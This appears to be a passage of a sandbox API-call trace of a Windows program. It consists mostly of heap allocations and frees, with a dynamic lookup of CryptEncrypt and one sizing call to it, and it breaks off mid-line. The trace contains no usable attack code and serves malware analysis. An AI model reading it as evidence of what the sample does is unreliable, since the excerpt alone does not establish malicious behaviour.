RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0182.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0182.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0182.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0182.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0182.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0182.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0182.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0182.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0182.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0182.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0182.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0182.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0182.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0182.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0182.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0182.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc4066) returned 0x10cb020 [0182.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x10cb020 | out: hHeap=0x970000) returned 1 [0182.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0182.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0182.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0182.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0182.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0182.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0182.917] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0182.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0182.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0182.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0182.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0182.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0182.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0182.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0182.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0182.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0182.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0182.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e509f8 [0182.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0182.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0182.921] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54378 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0182.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0182.921] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xc4066, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xc4068) returned 1 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0182.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0182.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0182.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0182.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0182.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0182.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0182.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0182.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0182.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0182.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 